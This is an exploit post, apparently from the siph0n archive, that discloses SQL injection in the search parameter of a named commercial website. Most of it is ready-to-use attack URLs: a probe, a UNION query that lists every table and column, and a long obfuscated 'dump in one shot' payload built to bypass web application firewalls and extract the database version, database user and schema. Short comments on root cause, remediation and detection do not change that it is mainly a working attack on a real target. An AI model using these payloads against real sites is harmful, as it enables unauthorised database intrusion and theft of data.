|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
 
-----------------------------------------------------------------------------------------------
Site: http://sleepwellproducts.com/
-----------------------------------------------------------------------------------------------
######################
# Exploit Title : Sleepwellproducts SQL Injection
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : http://sleepwellproducts.com
# Tested On : Windows 7 / Kali Linux / Mozilla Firefox
######################
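# Target (injectable GET parameter: keyword_search):
# Root cause, as far as the requests below show: the keyword_search value reaches the SQL query unescaped, so a trailing single quote breaks out of the string literal.
# Remediation: pass keyword_search as a bound parameter (prepared statement) rather than concatenating it into the query text.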
# http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1'

# http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1' union select 1,2,3,4,group_concat(table_name,column_name),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--+-

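# DIOS (Dump in one shot) query
# What it reads: server version, current database and database user, plus every table and column name of the current schema from information_schema.columns, returned as HTML in the fifth column of the UNION.
# Detection: keyword_search values containing union select, information_schema, long 0x hex literals or MySQL versioned comments (/*!12345 ... */) in web-server or WAF logs.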
http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1' union select 1,2,3,4,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:[email protected]%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:[email protected]_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--+-

# siph0n [2018-05-17]